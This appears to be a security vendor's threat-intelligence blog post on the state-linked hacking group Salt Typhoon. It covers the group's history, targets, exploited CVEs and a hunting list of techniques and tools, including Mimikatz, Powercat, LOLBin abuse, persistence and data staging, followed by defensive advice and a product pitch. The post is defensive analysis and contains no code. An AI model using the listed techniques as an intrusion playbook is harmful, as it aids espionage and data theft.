Salt Typhoon: The Threat Group Behind Major Cyberattacks

Salt Typhoon is an Advanced Persistent Threat (APT) group that is responsible for a series of breaches targeting United States infrastructure and government agencies. 

Salt Typhoon is known by many names depending on which security vendor is being referenced — Ghost Emperor by Kaspersky, FamousSparrow by ESET, Earth Estrie by Trend Micro, and UNC2286 by Mandiant, to name a few. 

There is significant evidence that the group, allegedly backed by China’s Ministry of State Security (MSS), is comprised of multiple distinct operating teams, each responsible for different victim sectors and operational responsibilities. This indicates a high degree of organization and maturity. 

It’s important that organizations understand how the threat group operates and its recent impacts for several reasons, including:

• Advanced Persistent Threat (APT) backed by China Ministry of State Security (MSS) 
• Victim emphasis on corporate data theft and government counterintelligence 
• Focus on espionage rather than disruption — stealing sensitive data 
• Attempts to maintain a stealthy and long-term presence in compromised networks 
• Relies on both Living Off the Land Binaries (LOLBINS) as well as custom tools 

Continue reading to learn more about the group’s recent activity, successful attacks, and strategies to defend company data.

The history and recent activity of Salt Typhoon 

The group has likely existed for some time as an offshoot of PRC state-sponsored offensive cyber operations such as Volt Typhoon, demonstrating similar Tactics, Techniques, and Procedures (TTPs).

The offshoot group is believed to have been operating in some capacity since August 2019, attempting to compromise high-value individual targets such as President Donald Trump.

Since then, multiple breach events have been attributed to Salt Typhoon — the latest one being the compromise of multiple U.S. telecom networks. Prior to this attack, CISA made it clear that their threat hunters spotted the group with a presence in multiple Federal government networks.

This identification allowed for the take-over of a Virtual Private Server (VPS) used by the organization and allowed for a more rapid association to additional private-sector victims, including the aforementioned telecom groups. 

The group is believed to have been surreptitiously collecting information, such as geolocation, from hundreds of devices in the Washington D.C. area over the past year while the compromise was still active.

Additionally, this level of breach provided Salt Typhoon with unprecedented access to sensitive data through the telecommunication infrastructure of many major providers such as Verizon, AT&T and at least seven others.

In January 2025, the Department of Treasury Office of Foreign Assets Control (OFAC) sanctioned Sichuan Juxinhe Network Technology, a Shanghai-based cybersecurity organization alleged to be directly involved with Salt Typhoon and related breaches. These types of sanctions against Chinese companies are not new to the U.S. government – another China-linked actor, Integrity Technology Group, is alleged to have managed a botnet comprised of over 260,000 devices since 2021, with victims spanning across multiple continents. 

The importance of victimology 

Salt Typhoon has distinguished itself mainly in terms of victimology, involving the widespread targeting US Government agencies, infrastructure, and political figure-heads — some examples of this include: 

• Targeting of Presidential and Vice Presidential candidates 
• Infiltration of US Telecommunication infrastructure 

The targeting of political candidates included specific attempts to maliciously access their mobile devices to likely glean additional information regarding sensitive data contained on the phones, such as messages, emails, files, or other information. 

While little technical data is known regarding the functional internals of their attacks on telecommunication infrastructure, Salt Typhoon likely performed numerous objectives, including data exfiltration, surveillance of prioritized targets, and general network reconnaissance activities after gaining access to such networks. One activity that is known is their deployment of a custom backdoor utility known as 'JumbledPath', which was responsible for monitoring network traffic to capture sensitive data at critical network junctions. 

Salt Typhoon has been primarily observed in breaches associated with telecom, government, and hospitality providers. It is highly probable that other sectors containing information of interest to the MSS would also be attacked by the group.

They are also well-known for taking aim at political targets, including individual candidates and likely campaign offices. 

Common TTPs used by Salt Typhoon 

Analysis of the exact techniques employed by Salt Typhoon, both pre and post compromise, are sparse - likely to maintain strong adversary knowledge internally for organizations that have dealt with their breaches. This is common for APTs to ensure that the adversary does not have a strong accounting of ‘what is known’ by cyber defenders. 

The below TTPs have been commonly associated with this threat group and should be used for broad-scope hunting across networks where there is suspicion of a compromise. 

TTPs include (but are not limited to):

• Abuse of LOLBins 
  • BITSAdmin 
  • CertUtil 
  • PowerShell 
• Abuse of WMI for Command Execution 
• Abuse of SMB for Lateral Movement 
• Abuse of PsExec for Command Execution / Lateral Movement 
• Other tools observed include Mimikatz, CobaltStrike, Powercat, etc 

Additionally, blue teams have observed the group exploiting the below vulnerabilities in public-facing appliances or applications: 

• CVE-2023-46805/CVE-2024-21887 – Ivanti Secure Connect VPN 
• CVE-2023-48788 – Fortinet FortiClient EMS 
• CVE-2022-3236 – Sophos Firewall 
• Multiple CVEs for Microsoft Exchange relating to ProxyLogon Attack 
• Vulnerabilities in Apache Tomcat present in QConvergeConsole 

Once a foothold is gained on a network, researchers have observed the following types of information-gathering and reconnaissance techniques being leveraged by the group: 

• Retrieving ‘Domain Admin’ group details 
• Abuse of “copy.exe” to retrieve remotely hosted payloads 
• Abuse of .cab files to mask malicious payloads 
• Execution of tools via batch scripts 
• Abuse of rar.exe to compress sensitive data prior to exfiltration, especially into directories such as C:\Users\Public\Music 
• Modification of registry run keys to achieve persistence 
• Creation of Windows Services to achieve persistence 
• DLL Sideloading attacks designed to escalate privileges by hijacking legitimate application flows 
• Raw-reads of NTFS to bypass access controls that may lock or prevent users, even local admins, from viewing certain files. 

Recommendations to defend against threats like Salt Typhoon 

Keeping sensitive data secure from threats like Salt Typhoon is crucial, especially with the group’s emphasis on corporate data theft and government counterintelligence.

Our defensive recommendations include:

• Ensure access to company sensitive data is tightly controlled and monitored, with user-behavior alerting configured to watch for anomalous access. 
• Ensure that all public-facing applications are kept up to date with respect to both Operating System and running Applications. 
• Ensure that all remote access mechanisms (VPN, VDI, M365, etc) are configured with strong MFA mechanisms to prevent immediate user access in the event of a credential compromise. 
• Ensure that network security controls are in place with deny-all rules for outbound communication as a default to prevent unwanted connections to external hosts. 
• Ensure data is encrypted both at-rest and in-transit. 
• Measure and manage your external attack surface periodically to identify any critical gaps or failings in existing controls. 
• Deploy Endpoint Detection & Response software to all endpoints in the organization. 
• Prepare Incident Response Plans (IRPs) for security events before they occur to both test and validate that expected defenses will be effective. 
• Engage in table-top exercises to simulate anticipated threats with the goal of identifying weaknesses and strengths in IRPs. 

How Varonis can help 

Threat actors such as Salt Typhoon target critical data in their victims' networks. Being able to detect and audit historical data access is paramount to identifying these types of threats.

If your organization does not have visibility into data, identifying anomalous access or exfiltration will be nearly impossible — this is where Varonis plays a key role in your security stack. 

Exfiltrating critical data is by far the most common tactic utilized by groups such as Salt Typhoon. Lacking this audit capability leaves organizations in a precarious position when it comes to detecting both basic and advanced threats to data. 

Using User and Entity Behavior Analytics (UEBA) across multiple data streams, such as File Shares, Active Directory, DNS, Proxy, and more, makes Varonis well-positioned to identify and alert on anomalous access and data theft, helping to more thoroughly protect your organization’s crown jewels. 

Learn more with State of Cybercrime 

Varonis' Matt Radolec and David Gibson cover Salt Typhoon's activity in State of Cybercrime, a video series covering the latest in cybercrime news. Enjoy the episodes below to learn more about Salt Typhoon and join us for a live show. 

Matt and David cover the rise of Salt Typhoon and other cybercrime news.

Matt and David give an update onSalt Typhoon's recent activity.